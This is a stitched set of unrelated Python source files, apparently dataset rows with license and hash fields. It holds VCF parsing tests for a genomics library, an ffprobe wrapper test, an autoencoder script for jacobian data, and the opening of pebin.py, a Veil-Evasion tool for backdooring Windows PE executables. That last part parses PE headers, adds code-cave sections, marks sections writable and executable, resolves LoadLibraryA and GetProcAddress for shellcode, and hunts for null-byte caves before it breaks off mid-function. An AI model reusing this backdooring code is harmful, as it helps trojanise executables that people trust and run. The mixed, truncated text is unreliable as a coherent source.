db_name = os.path.join(mitty.tests.data_dir, 't2.h5')
open(vcf_name, 'w').write(_vcf)
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name)
vl = p.get_sample_variant_list_for_chromosome(1, 's1')
assert vl[0][0]['pos'] == 119
assert vl[0][0]['stop'] == 120
assert vl[1][1]['pos'] == 139
assert vl[1][1]['stop'] == 142
assert vl[0].size == 2
assert vl[1].size == 2
def vcf_reader_test3():
"""VCF with GT data and some other fields"""
_vcf = """##fileformat=VCFv4.1
##contig=<ID=NC_010142.1,length=908485,md5=9a28f270df93bb4ac0764676de1866b3>
##contig=<ID=NC_010143.1,length=1232258,md5=ab882206d71bc36051f437e66246da6b>
##contig=<ID=NC_010144.1,length=1253087,md5=ab11fdfc260a2b78fdb845d89c7a89f2>
##contig=<ID=NC_010145.1,length=1282939,md5=b3c4b1a7b3671e2e8d4f4b1d2b599c44>
##contig=<ID=NC_010146.1,length=1621617,md5=3dbe62009f563fd1a6e3eadc15617e5c>
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
##FORMAT=<ID=GL,Number=3,Type=Float,Description="Likelihoods for RR,RA,AA genotypes (R=ref,A=alt)">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\ts1
NC_010142.1\t100\t.\tA\tT\t50\tPASS\t.\tGT:GL\t0|1:41,0,57
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\t.\tGT:GL\t1|0:41,0,57
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\t.\tGT:GL\t1|1:41,0,57
NC_010146.1\t100\t.\tA\tT\t50\tPASS\t.\tGT:GL\t.:41,0,57
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf2.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't2.h5')
open(vcf_name, 'w').write(_vcf)
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name)
vl = p.get_sample_variant_list_for_chromosome(1, 's1')
assert vl[0][0]['pos'] == 119
assert vl[0][0]['stop'] == 120
assert vl[1][1]['pos'] == 139
assert vl[1][1]['stop'] == 142
assert vl[0].size == 2
assert vl[1].size == 2
def vcf_reader_test4():
"""VCF with no genome metadata"""
_vcf = """##fileformat=VCFv4.1
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
##FORMAT=<ID=GL,Number=3,Type=Float,Description="Likelihoods for RR,RA,AA genotypes (R=ref,A=alt)">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\ts1
NC_010142.1\t100\t.\tA\tT\t50\tPASS\t.\tGT:GL\t0|1:41,0,57
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\t.\tGT:GL\t1|0:41,0,57
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\t.\tGT:GL\t1|1:41,0,57
NC_010146.1\t100\t.\tA\tT\t50\tPASS\t.\tGT:GL\t.:41,0,57
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf2.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't2.h5')
open(vcf_name, 'w').write(_vcf)
genome_metadata = [
{'seq_id': 'NC_010142.1', 'seq_len': 908485, 'seq_md5': '9a28f270df93bb4ac0764676de1866b3'},
{'seq_id': 'NC_010143.1', 'seq_len': 1232258, 'seq_md5': 'ab882206d71bc36051f437e66246da6b'},
{'seq_id': 'NC_010144.1', 'seq_len': 1253087, 'seq_md5': 'ab11fdfc260a2b78fdb845d89c7a89f2'},
{'seq_id': 'NC_010145.1', 'seq_len': 1282939, 'seq_md5': 'b3c4b1a7b3671e2e8d4f4b1d2b599c44'},
{'seq_id': 'NC_010146.1', 'seq_len': 1621617, 'seq_md5': '3dbe62009f563fd1a6e3eadc15617e5c'}
]
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name, genome_metadata=genome_metadata)
vl = p.get_sample_variant_list_for_chromosome(1, 's1')
assert vl[0][0]['pos'] == 119
assert vl[0][0]['stop'] == 120
assert vl[1][1]['pos'] == 139
assert vl[1][1]['stop'] == 142
assert vl[0].size == 2
assert vl[1].size == 2
def vcf_reader_test5():
"""VCF with multiple samples"""
_vcf = """##fileformat=VCFv4.1
##contig=<ID=NC_010142.1,length=908485,md5=9a28f270df93bb4ac0764676de1866b3>
##contig=<ID=NC_010143.1,length=1232258,md5=ab882206d71bc36051f437e66246da6b>
##contig=<ID=NC_010144.1,length=1253087,md5=ab11fdfc260a2b78fdb845d89c7a89f2>
##contig=<ID=NC_010145.1,length=1282939,md5=b3c4b1a7b3671e2e8d4f4b1d2b599c44>
##contig=<ID=NC_010146.1,length=1621617,md5=3dbe62009f563fd1a6e3eadc15617e5c>
##FORMAT=<ID=GT,Number=1,Type=String,Description="Genotype">
#CHROM\tPOS\tID\tREF\tALT\tQUAL\tFILTER\tINFO\tFORMAT\ts1\ts2
NC_010142.1\t100\t.\tA\tT\t50\tPASS\t.\tGT\t0|1\t1|0
NC_010142.1\t120\t.\tA\tACT\t50\tPASS\t.\tGT\t1|0\t0|1
NC_010142.1\t140\t.\tACT\tA\t50\tPASS\t.\tGT\t1|1\t0|0
NC_010146.1\t100\t.\tA\tT\t50\tPASS\t.\tGT\t.\t1|1
"""
vcf_name = os.path.join(mitty.tests.data_dir, 'vcf2.vcf')
db_name = os.path.join(mitty.tests.data_dir, 't2.h5')
open(vcf_name, 'w').write(_vcf)
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name)
vl = p.get_sample_variant_list_for_chromosome(1, 's1')
assert vl[0][0]['pos'] == 119
assert vl[0][0]['stop'] == 120
assert vl[1][1]['pos'] == 139
assert vl[1][1]['stop'] == 142
assert vl[0].size == 2
assert vl[1].size == 2
db_name = os.path.join(mitty.tests.data_dir, 't3.h5')
p = vcf2pop.vcf_to_pop(vcf_fname=vcf_name, pop_fname=db_name, sample_name='s2')
vl = p.get_sample_variant_list_for_chromosome(1, 's2')
assert vl[1][0]['pos'] == 119
assert vl[1][0]['stop'] == 120
assert vl[0].size == 1
assert vl[1].size == 1 | gpl-2.0 | -6,210,237,791,864,790,000 | 48.277533 | 452 | 0.699687 | false |
melon-boy/odroid-webserver | pkg/ffmpeg_pywrapper/ffmpeg_pywrapper/tests/test.py | 1 | 2414 | #!/usr/bin/python
from unittest import TestCase, main
from ffmpeg_pywrapper.ffprobe import FFProbe
import pkg_resources
class TestFFProbe(TestCase):
'''
Unit test for FFProbe output
'''
VIDEO_FILE = pkg_resources.resource_filename('ffmpeg_pywrapper', 'res/test.mp4')
def test_print_formats(self):
ff = FFProbe(self.VIDEO_FILE)
filename = str(ff.get_format_filename())
self.assertTrue(filename)
duration = str(ff.get_format_duration())
self.assertTrue(duration)
format_name = str(ff.get_format_format_name())
self.assertTrue(format_name)
start_time = str(ff.get_format_start_time())
self.assertTrue(start_time)
size = str(ff.get_format_size())
self.assertTrue(size)
bit_rate = str(ff.get_format_bit_rate())
self.assertTrue(bit_rate)
print('-------------------------------------------------')
print('- Test 1: video file formats -')
print('-------------------------------------------------')
print('File name: ' + str(filename))
print('Duration (seconds): ' + str(duration))
print('Format: ' + str(format_name))
print('Start time (seconds): ' + str(start_time))
print('File Size (Kb): ' + str(size))
print('Bit rate (Kb/s): ' + str(bit_rate))
print('-------------------------------------------------')
print('- End of Test 1. -')
print('-------------------------------------------------')
print('-------------------------------------------------')
print('- Test 2: ffprobe command line execution -')
print('-------------------------------------------------')
def test_command_line_execution(self):
ff = FFProbe(self.VIDEO_FILE)
options = '-v error -show_entries format'
print('Arguments : ' + str(options))
res = ff.command_line_execution(options)
print('Output: ' + str(res))
print('-------------------------------------------------')
print('- End of Test 2. -')
print('-------------------------------------------------')
if __name__ == '__main__':
main()
| mit | -4,393,099,233,897,129,500 | 32.527778 | 84 | 0.423364 | false |
lmjohns3/cube-experiment | analysis/11-compress-jacobians.py | 1 | 2143 | import climate
import glob
import gzip
import io
import lmj.cubes
import logging
import numpy as np
import os
import pandas as pd
import pickle
import theanets
def compress(source, k, activation, **kwargs):
fns = sorted(glob.glob(os.path.join(source, '*', '*_jac.csv.gz')))
logging.info('%s: found %d jacobians', source, len(fns))
# the clipping operation affects about 2% of jacobian values.
dfs = [np.clip(pd.read_csv(fn, index_col='time').dropna(), -10, 10)
for fn in fns]
B, N = 128, dfs[0].shape[1]
logging.info('loaded %s rows of %d-D data from %d files',
sum(len(df) for df in dfs), N, len(dfs))
def batch():
batch = np.zeros((B, N), 'f')
for b in range(B):
a = np.random.randint(len(dfs))
batch[b] = dfs[a].iloc[np.random.randint(len(dfs[a])), :]
return [batch]
pca = theanets.Autoencoder([N, (k, activation), (N, 'tied')])
pca.train(batch, **kwargs)
key = '{}_k{}'.format(activation, k)
if 'hidden_l1' in kwargs:
key += '_s{hidden_l1:.4f}'.format(**kwargs)
for df, fn in zip(dfs, fns):
df = pd.DataFrame(pca.encode(df.values.astype('f')), index=df.index)
s = io.StringIO()
df.to_csv(s, index_label='time')
out = fn.replace('_jac', '_jac_' + key)
with gzip.open(out, 'wb') as handle:
handle.write(s.getvalue().encode('utf-8'))
logging.info('%s: saved %s', out, df.shape)
out = os.path.join(source, 'pca_{}.pkl'.format(key))
pickle.dump(pca, open(out, 'wb'))
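# Hedged sketch (not part of the original script): the batch() closure above
# draws each minibatch row from a randomly chosen file; this standalone version
# shows the same sampling idea on plain numpy arrays (all assumed to share the
# same column count), instead of the DataFrames used in compress().
def sample_batch(arrays, batch_size=128):
    n_cols = arrays[0].shape[1]
    batch = np.zeros((batch_size, n_cols), 'f')
    for b in range(batch_size):
        a = np.random.randint(len(arrays))
        batch[b] = arrays[a][np.random.randint(len(arrays[a]))]
    return [batch]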
@climate.annotate(
root='load data files from subject directories in this path',
k=('compress to this many dimensions', 'option', None, int),
activation=('use this activation function', 'option'),
)
def main(root, k=1000, activation='relu'):
for subject in lmj.cubes.Experiment(root).subjects:
compress(subject.root, k, activation,
momentum=0.9,
hidden_l1=0.01,
weight_l1=0.01,
monitors={'hid1:out': (0.01, 0.1, 1, 10)})
if __name__ == '__main__':
climate.call(main)
| mit | 1,167,373,156,157,772,800 | 30.057971 | 76 | 0.580495 | false |
codercold/Veil-Evasion | tools/backdoor/pebin.py | 1 | 54056 | '''
Author Joshua Pitts the.midnite.runr 'at' gmail <d ot > com
Copyright (C) 2013,2014, Joshua Pitts
License: GPLv3
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
See <http://www.gnu.org/licenses/> for a copy of the GNU General
Public License
Currently supports win32/64 PE and linux32/64 ELF only(intel architecture).
This program is to be used for only legal activities by IT security
professionals and researchers. Author not responsible for malicious
uses.
'''
import sys
import os
import struct
import shutil
import platform
import stat
import time
import subprocess
import pefile
from random import choice
from intel.intelCore import intelCore
from intel.intelmodules import eat_code_caves
from intel.WinIntelPE32 import winI32_shellcode
from intel.WinIntelPE64 import winI64_shellcode
MachineTypes = {'0x0': 'AnyMachineType',
'0x1d3': 'Matsushita AM33',
'0x8664': 'x64',
'0x1c0': 'ARM LE',
'0x1c4': 'ARMv7',
'0xaa64': 'ARMv8 x64',
'0xebc': 'EFIByteCode',
'0x14c': 'Intel x86',
'0x200': 'Intel Itanium',
'0x9041': 'M32R',
'0x266': 'MIPS16',
'0x366': 'MIPS w/FPU',
'0x466': 'MIPS16 w/FPU',
'0x1f0': 'PowerPC LE',
'0x1f1': 'PowerPC w/FP',
'0x166': 'MIPS LE',
'0x1a2': 'Hitachi SH3',
'0x1a3': 'Hitachi SH3 DSP',
'0x1a6': 'Hitachi SH4',
'0x1a8': 'Hitachi SH5',
'0x1c2': 'ARM or Thumb -interworking',
'0x169': 'MIPS little-endian WCE v2'
}
#What is supported:
supported_types = ['Intel x86', 'x64']
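# Hedged helper (not part of the original source): translate a raw COFF Machine
# value (e.g. 0x14c read from the file header) into the human readable name
# used in the MachineTypes table above.
def machine_type_name(machine_value):
    for mactype, name in MachineTypes.iteritems():
        if int(mactype, 16) == machine_value:
            return name
    return 'Unknown MachineType'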
class pebin():
"""
This is the pe binary class. PE files get fed in, stuff is checked, and patching happens.
"""
def __init__(self, FILE, OUTPUT, SHELL, NSECTION='sdata', DISK_OFFSET=0, ADD_SECTION=False,
CAVE_JUMPING=False, PORT=8888, HOST="127.0.0.1", SUPPLIED_SHELLCODE=None,
INJECTOR=False, CHANGE_ACCESS=True, VERBOSE=False, SUPPORT_CHECK=False,
SHELL_LEN=300, FIND_CAVES=False, SUFFIX=".old", DELETE_ORIGINAL=False, CAVE_MINER=False,
IMAGE_TYPE="ALL", ZERO_CERT=True, CHECK_ADMIN=False, PATCH_DLL=True):
self.FILE = FILE
self.OUTPUT = OUTPUT
self.SHELL = SHELL
self.NSECTION = NSECTION
self.DISK_OFFSET = DISK_OFFSET
self.ADD_SECTION = ADD_SECTION
self.CAVE_JUMPING = CAVE_JUMPING
self.PORT = PORT
self.HOST = HOST
self.SUPPLIED_SHELLCODE = SUPPLIED_SHELLCODE
self.INJECTOR = INJECTOR
self.CHANGE_ACCESS = CHANGE_ACCESS
self.VERBOSE = VERBOSE
self.SUPPORT_CHECK = SUPPORT_CHECK
self.SHELL_LEN = SHELL_LEN
self.FIND_CAVES = FIND_CAVES
self.SUFFIX = SUFFIX
self.DELETE_ORIGINAL = DELETE_ORIGINAL
self.CAVE_MINER = CAVE_MINER
self.IMAGE_TYPE = IMAGE_TYPE
self.ZERO_CERT = ZERO_CERT
self.CHECK_ADMIN = CHECK_ADMIN
self.PATCH_DLL = PATCH_DLL
self.flItms = {}
def run_this(self):
if self.INJECTOR is True:
self.injector()
sys.exit()
if self.FIND_CAVES is True:
issupported = self.support_check()
if issupported is False:
print self.FILE, "is not supported."
return False
print ("Looking for caves with a size of %s bytes (measured as an integer" % self.SHELL_LEN)
self.find_all_caves()
return True
if self.SUPPORT_CHECK is True:
if not self.FILE:
print "You must provide a file to see if it is supported (-f)"
return False
try:
is_supported = self.support_check()
except Exception, e:
is_supported = False
print 'Exception:', str(e), '%s' % self.FILE
if is_supported is False:
print "%s is not supported." % self.FILE
return False
else:
print "%s is supported." % self.FILE
return True
self.output_options()
return self.patch_pe()
def gather_file_info_win(self):
"""
Gathers necessary PE header information to backdoor
a file and returns a dict of file information called flItms
"""
#To do:
# verify signed vs unsigned
# map all headers
# map offset once the magic field is determined of 32+/32
self.binary.seek(int('3C', 16))
print "[*] Gathering file info"
self.flItms['filename'] = self.FILE
self.flItms['buffer'] = 0
self.flItms['JMPtoCodeAddress'] = 0
self.flItms['LocOfEntryinCode_Offset'] = self.DISK_OFFSET
#---!!!! This will need to change for x64 !!!!
#not so sure now..
self.flItms['dis_frm_pehdrs_sectble'] = 248
self.flItms['pe_header_location'] = struct.unpack('<i', self.binary.read(4))[0]
# Start of COFF
self.flItms['COFF_Start'] = self.flItms['pe_header_location'] + 4
self.binary.seek(self.flItms['COFF_Start'])
self.flItms['MachineType'] = struct.unpack('<H', self.binary.read(2))[0]
if self.VERBOSE is True:
for mactype, name in MachineTypes.iteritems():
if int(mactype, 16) == self.flItms['MachineType']:
print 'MachineType is:', name
#self.binary.seek(self.flItms['BoundImportLocation'])
#self.flItms['BoundImportLOCinCode'] = struct.unpack('<I', self.binary.read(4))[0]
self.binary.seek(self.flItms['COFF_Start'] + 2, 0)
self.flItms['NumberOfSections'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['TimeDateStamp'] = struct.unpack('<I', self.binary.read(4))[0]
self.binary.seek(self.flItms['COFF_Start'] + 16, 0)
self.flItms['SizeOfOptionalHeader'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['Characteristics'] = struct.unpack('<H', self.binary.read(2))[0]
#End of COFF
self.flItms['OptionalHeader_start'] = self.flItms['COFF_Start'] + 20
#if self.flItms['SizeOfOptionalHeader']:
#Begin Standard Fields section of Optional Header
self.binary.seek(self.flItms['OptionalHeader_start'])
self.flItms['Magic'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MajorLinkerVersion'] = struct.unpack("!B", self.binary.read(1))[0]
self.flItms['MinorLinkerVersion'] = struct.unpack("!B", self.binary.read(1))[0]
self.flItms['SizeOfCode'] = struct.unpack("<I", self.binary.read(4))[0]
self.flItms['SizeOfInitializedData'] = struct.unpack("<I", self.binary.read(4))[0]
self.flItms['SizeOfUninitializedData'] = struct.unpack("<I",
self.binary.read(4))[0]
self.flItms['AddressOfEntryPoint'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['BaseOfCode'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'Magic', self.flItms['Magic']
if self.flItms['Magic'] != int('20B', 16):
#print 'Not 0x20B!'
self.flItms['BaseOfData'] = struct.unpack('<I', self.binary.read(4))[0]
# End Standard Fields section of Optional Header
# Begin Windows-Specific Fields of Optional Header
if self.flItms['Magic'] == int('20B', 16):
#print 'x64!'
self.flItms['ImageBase'] = struct.unpack('<Q', self.binary.read(8))[0]
else:
self.flItms['ImageBase'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'self.flItms[ImageBase]', hex(self.flItms['ImageBase'])
self.flItms['SectionAlignment'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['FileAlignment'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['MajorOperatingSystemVersion'] = struct.unpack('<H',
self.binary.read(2))[0]
self.flItms['MinorOperatingSystemVersion'] = struct.unpack('<H',
self.binary.read(2))[0]
self.flItms['MajorImageVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MinorImageVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MajorSubsystemVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['MinorSubsystemVersion'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['Win32VersionValue'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfImageLoc'] = self.binary.tell()
self.flItms['SizeOfImage'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeaders'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['CheckSum'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['Subsystem'] = struct.unpack('<H', self.binary.read(2))[0]
self.flItms['DllCharacteristics'] = struct.unpack('<H', self.binary.read(2))[0]
if self.flItms['Magic'] == int('20B', 16):
self.flItms['SizeOfStackReserve'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfStackCommit'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfHeapReserve'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['SizeOfHeapCommit'] = struct.unpack('<Q', self.binary.read(8))[0]
else:
self.flItms['SizeOfStackReserve'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfStackCommit'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeapReserve'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['SizeOfHeapCommit'] = struct.unpack('<I', self.binary.read(4))[0]
self.flItms['LoaderFlags'] = struct.unpack('<I', self.binary.read(4))[0] # zero
self.flItms['NumberofRvaAndSizes'] = struct.unpack('<I', self.binary.read(4))[0]
# End Windows-Specific Fields of Optional Header
# Begin Data Directories of Optional Header
self.flItms['ExportTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ImportTableLOCInPEOptHdrs'] = self.binary.tell()
self.flItms['ImportTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ResourceTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['ExceptionTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['CertTableLOC'] = self.binary.tell()
self.flItms['CertificateTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['BaseReLocationTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Debug'] = struct.unpack('<Q', self.binary.read(8))[0]
        self.flItms['Architecture'] = struct.unpack('<Q', self.binary.read(8))[0] # zero
self.flItms['GlobalPrt'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['TLS Table'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['LoadConfigTable'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['BoundImportLocation'] = self.binary.tell()
#print 'BoundImportLocation', hex(self.flItms['BoundImportLocation'])
self.flItms['BoundImport'] = struct.unpack('<Q', self.binary.read(8))[0]
self.binary.seek(self.flItms['BoundImportLocation'])
self.flItms['BoundImportLOCinCode'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'first IATLOCIN CODE', hex(self.flItms['BoundImportLOCinCode'])
self.flItms['BoundImportSize'] = struct.unpack('<I', self.binary.read(4))[0]
#print 'BoundImportSize', hex(self.flItms['BoundImportSize'])
self.flItms['IAT'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['DelayImportDesc'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['CLRRuntimeHeader'] = struct.unpack('<Q', self.binary.read(8))[0]
self.flItms['Reserved'] = struct.unpack('<Q', self.binary.read(8))[0] # zero
self.flItms['BeginSections'] = self.binary.tell()
        if self.flItms['NumberOfSections'] != 0:
self.flItms['Sections'] = []
for section in range(self.flItms['NumberOfSections']):
sectionValues = []
sectionValues.append(self.binary.read(8))
# VirtualSize
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# VirtualAddress
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# SizeOfRawData
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToRawData
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToRelocations
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# PointerToLinenumbers
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
# NumberOfRelocations
sectionValues.append(struct.unpack('<H', self.binary.read(2))[0])
# NumberOfLinenumbers
sectionValues.append(struct.unpack('<H', self.binary.read(2))[0])
# SectionFlags
sectionValues.append(struct.unpack('<I', self.binary.read(4))[0])
self.flItms['Sections'].append(sectionValues)
if 'UPX'.lower() in sectionValues[0].lower():
print "UPX files not supported."
return False
if ('.text\x00\x00\x00' == sectionValues[0] or
'AUTO\x00\x00\x00\x00' == sectionValues[0] or
'CODE\x00\x00\x00\x00' == sectionValues[0]):
self.flItms['textSectionName'] = sectionValues[0]
self.flItms['textVirtualAddress'] = sectionValues[2]
self.flItms['textPointerToRawData'] = sectionValues[4]
elif '.rsrc\x00\x00\x00' == sectionValues[0]:
self.flItms['rsrcSectionName'] = sectionValues[0]
self.flItms['rsrcVirtualAddress'] = sectionValues[2]
self.flItms['rsrcSizeRawData'] = sectionValues[3]
self.flItms['rsrcPointerToRawData'] = sectionValues[4]
self.flItms['VirtualAddress'] = self.flItms['SizeOfImage']
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
self.flItms['textVirtualAddress'] +
self.flItms['textPointerToRawData'] +
self.flItms['LocOfEntryinCode_Offset'])
else:
self.flItms['LocOfEntryinCode'] = (self.flItms['AddressOfEntryPoint'] -
self.flItms['LocOfEntryinCode_Offset'])
self.flItms['VrtStrtngPnt'] = (self.flItms['AddressOfEntryPoint'] +
self.flItms['ImageBase'])
self.binary.seek(self.flItms['BoundImportLOCinCode'])
self.flItms['ImportTableALL'] = self.binary.read(self.flItms['BoundImportSize'])
self.flItms['NewIATLoc'] = self.flItms['BoundImportLOCinCode'] + 40
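        # The 40-byte offset matches the size of one IMAGE_SECTION_HEADER entry,
        # presumably reserving room for the extra section header added later by
        # create_code_cave().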
####################################
#### Parse imports via pefile ######
self.binary.seek(0)
#make this option only if a IAT based shellcode is selected
if 'iat' in self.SHELL:
print "[*] Loading PE in pefile"
pe = pefile.PE(self.FILE, fast_load=True)
#pe = pefile.PE(data=self.binary)
print "[*] Parsing data directories"
pe.parse_data_directories()
try:
for entry in pe.DIRECTORY_ENTRY_IMPORT:
#print entry.dll
for imp in entry.imports:
#print imp.name
#print "\t", imp.name
if imp.name is None:
continue
if imp.name.lower() == 'loadlibrarya':
self.flItms['LoadLibraryAOffset'] = imp.address - pe.OPTIONAL_HEADER.ImageBase
self.flItms['LoadLibraryA'] = imp.address
if imp.name.lower() == 'getprocaddress':
self.flItms['GetProcAddressOffset'] = imp.address - pe.OPTIONAL_HEADER.ImageBase
self.flItms['GetProcAddress'] = imp.address
''' #save for later use
if imp.name.lower() == 'createprocessa':
print imp.name, hex(imp.address)
if imp.name.lower() == 'waitforsingleobject':
print imp.name, hex(imp.address)
if imp.name.lower() == 'virtualalloc':
print imp.name, hex(imp.address)
if imp.name.lower() == 'connect':
print imp.name, hex(imp.address)
if imp.name.lower() == 'createthread':
print imp.name, hex(imp.address)
'''
except Exception as e:
print "Exception:", str(e)
#####################################
def print_flItms(self, flItms):
keys = self.flItms.keys()
keys.sort()
for item in keys:
if type(self.flItms[item]) == int:
print item + ':', hex(self.flItms[item])
elif item == 'Sections':
print "-" * 50
for section in self.flItms['Sections']:
print "Section Name", section[0]
print "Virutal Size", hex(section[1])
print "Virtual Address", hex(section[2])
print "SizeOfRawData", hex(section[3])
print "PointerToRawData", hex(section[4])
print "PointerToRelocations", hex(section[5])
print "PointerToLinenumbers", hex(section[6])
print "NumberOfRelocations", hex(section[7])
print "NumberOfLinenumbers", hex(section[8])
print "SectionFlags", hex(section[9])
print "-" * 50
else:
print item + ':', self.flItms[item]
print "*" * 50, "END flItms"
def change_section_flags(self, section):
"""
Changes the user selected section to RWE for successful execution
"""
print "[*] Changing Section Flags"
self.flItms['newSectionFlags'] = int('e00000e0', 16)
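        # 0xE00000E0 combines the read/write/execute memory permission bits with
        # the code/initialized-data/uninitialized-data content bits, making the
        # section RWX (interpretation of the standard PE section flag constants).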
self.binary.seek(self.flItms['BeginSections'], 0)
for _ in range(self.flItms['NumberOfSections']):
sec_name = self.binary.read(8)
if section in sec_name:
self.binary.seek(28, 1)
self.binary.write(struct.pack('<I', self.flItms['newSectionFlags']))
return
else:
self.binary.seek(32, 1)
def create_code_cave(self):
"""
This function creates a code cave for shellcode to hide,
takes in the dict from gather_file_info_win function and
writes to the file and returns flItms
"""
print "[*] Creating Code Cave"
self.flItms['NewSectionSize'] = len(self.flItms['shellcode']) + 250 # bytes
self.flItms['SectionName'] = self.NSECTION # less than 7 chars
self.flItms['filesize'] = os.stat(self.flItms['filename']).st_size
self.flItms['newSectionPointerToRawData'] = self.flItms['filesize']
self.flItms['VirtualSize'] = int(str(self.flItms['NewSectionSize']), 16)
self.flItms['SizeOfRawData'] = self.flItms['VirtualSize']
self.flItms['NewSectionName'] = "." + self.flItms['SectionName']
self.flItms['newSectionFlags'] = int('e00000e0', 16)
self.binary.seek(self.flItms['pe_header_location'] + 6, 0)
self.binary.write(struct.pack('<h', self.flItms['NumberOfSections'] + 1))
self.binary.seek(self.flItms['SizeOfImageLoc'], 0)
self.flItms['NewSizeOfImage'] = (self.flItms['VirtualSize'] +
self.flItms['SizeOfImage'])
self.binary.write(struct.pack('<I', self.flItms['NewSizeOfImage']))
self.binary.seek(self.flItms['BoundImportLocation'])
if self.flItms['BoundImportLOCinCode'] != 0:
self.binary.write(struct.pack('=i', self.flItms['BoundImportLOCinCode'] + 40))
self.binary.seek(self.flItms['BeginSections'] +
40 * self.flItms['NumberOfSections'], 0)
self.binary.write(self.flItms['NewSectionName'] +
"\x00" * (8 - len(self.flItms['NewSectionName'])))
self.binary.write(struct.pack('<I', self.flItms['VirtualSize']))
self.binary.write(struct.pack('<I', self.flItms['SizeOfImage']))
self.binary.write(struct.pack('<I', self.flItms['SizeOfRawData']))
self.binary.write(struct.pack('<I', self.flItms['newSectionPointerToRawData']))
if self.VERBOSE is True:
print 'New Section PointerToRawData'
print self.flItms['newSectionPointerToRawData']
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', 0))
self.binary.write(struct.pack('<I', self.flItms['newSectionFlags']))
self.binary.write(self.flItms['ImportTableALL'])
self.binary.seek(self.flItms['filesize'] + 1, 0) # moving to end of file
nop = choice(intelCore.nops)
if nop > 144:
self.binary.write(struct.pack('!H', nop) * (self.flItms['VirtualSize'] / 2))
else:
self.binary.write(struct.pack('!B', nop) * (self.flItms['VirtualSize']))
self.flItms['CodeCaveVirtualAddress'] = (self.flItms['SizeOfImage'] +
self.flItms['ImageBase'])
self.flItms['buffer'] = int('200', 16) # bytes
self.flItms['JMPtoCodeAddress'] = (self.flItms['CodeCaveVirtualAddress'] -
self.flItms['AddressOfEntryPoint'] -
self.flItms['ImageBase'] - 5 +
self.flItms['buffer'])
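        # The subtracted 5 accounts for the length of a relative JMP instruction
        # (0xE9 plus a 4-byte offset); 'buffer' skips 0x200 bytes into the new
        # section before the shellcode is placed.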
def find_all_caves(self):
"""
        This function finds all the code caves in an input file.
        Prints the results to the screen.
"""
print "[*] Looking for caves"
SIZE_CAVE_TO_FIND = self.SHELL_LEN
BeginCave = 0
Tracking = 0
count = 1
caveTracker = []
caveSpecs = []
self.binary = open(self.FILE, 'r+b')
self.binary.seek(0)
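        # Scan the file byte by byte, counting runs of consecutive null bytes;
        # every run at least SIZE_CAVE_TO_FIND bytes long is recorded in
        # caveTracker as a (start offset, end offset) pair.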
while True:
try:
s = struct.unpack("<b", self.binary.read(1))[0]
except Exception as e:
#print str(e)
break
if s == 0:
if count == 1:
BeginCave = Tracking
count += 1
else:
if count >= SIZE_CAVE_TO_FIND:
caveSpecs.append(BeginCave)
